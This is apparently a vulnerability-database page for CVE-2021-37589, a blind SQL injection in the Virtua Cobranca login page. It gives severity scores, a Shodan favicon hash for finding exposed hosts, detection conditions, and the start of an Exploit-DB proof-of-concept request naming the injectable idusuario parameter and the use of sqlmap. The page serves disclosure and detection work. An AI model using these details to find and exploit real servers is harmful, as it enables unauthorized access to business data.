CVE-2021-37589
published 2022-06-07CVE-2021-37589: Virtua Cobranca before 12R allows SQL Injection on the login page.
PriorityP266high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
29.67%
98.0th percentile
Virtua Cobranca before 12R allows SQL Injection on the login page.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| virtuasoftware | cobranca | < 12r | 12r |
Detection & IOCsextracted from sources · hover to see the quote
url/controller/origemdb.php?idselorigem=ATIVOS
otherhttp.favicon.hash:876876147
othericon_hash=876876147
- →HTTP 500 response to a login POST with a single quote in the idusuario parameter indicates unsanitized SQL injection point; a follow-up request with balanced SQL syntax returns HTTP 200, confirming blind SQLi. ↗
- →Detection condition: status_code_2 == 500 (malformed quote payload) AND status_code_3 == 200 (balanced quote payload) on the login endpoint confirms exploitation.
- →Response body containing the Portuguese error strings 'Os parametros não estão informados corretamente' or 'O CNPJ dos parametro não está informado corretamente' in the third request confirms successful blind SQLi probe.
- →The X-Requested-With: XMLHttpRequest header is required in the login POST requests for the injection to be processed correctly. ↗
- →Exploit uses sqlmap against the idusuario POST parameter targeting a Firebird DBMS backend. ↗
- ·The vulnerability is unauthenticated and requires no prior session; the PHPSESSID and origem_selecionado cookies are empty in the PoC, meaning no valid session is needed to exploit. ↗
- ·The NVD advisory states the vulnerable version is 'before 12R', while the Exploit-DB PoC was tested against version 12S, suggesting the vulnerability persisted beyond the initially reported boundary version. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Virtua Software Cobranca 12S - SQLi
exploitdb·2022-06-14·CVSS 7.5
CVE-2021-37589 [HIGH] Virtua Software Cobranca 12S - SQLi
Virtua Software Cobranca 12S - SQLi
---
# Exploit Title: Virtua Software Cobranca 12S - SQLi
# Shodan Query: http.favicon.hash:876876147
# Date: 13/08/2021
# Exploit Author: Luca Regne
# Vendor Homepage: https://www.virtuasoftware.com.br/
# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe
# Version: 12S
# Tested on: Windows Server 2019
# CVE : CVE-2021-37589
## Description
A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter.
## Request PoC
```
POST /controller/login.php?acao=autenticar HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gec
Nuclei
Virtua Software Cobranca <12R - Blind SQL Injection
nuclei·CVSS 7.5
CVE-2021-37589 [HIGH] Virtua Software Cobranca <12R - Blind SQL Injection
Virtua Software Cobranca <12R - Blind SQL Injection
Virtua Cobranca before 12R allows blind SQL injection on the login page.
Template:
id: CVE-2021-37589
info:
name: Virtua Software Cobranca <12R - Blind SQL Injection
author: princechaddha
severity: high
description: |
Virtua Cobranca before 12R allows blind SQL injection on the login page.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying system.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R.
reference:
- https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
- https://www.virtuasoftware.com.br/
- https://www.virtuasoftware.com.br/cont
No writeups or analysis indexed.
http://packetstormsecurity.com/files/167480/Virtua-Software-Cobranca-12S-SQL-Injection.htmlhttps://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-brhttp://packetstormsecurity.com/files/167480/Virtua-Software-Cobranca-12S-SQL-Injection.htmlhttps://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
2022-06-07
Published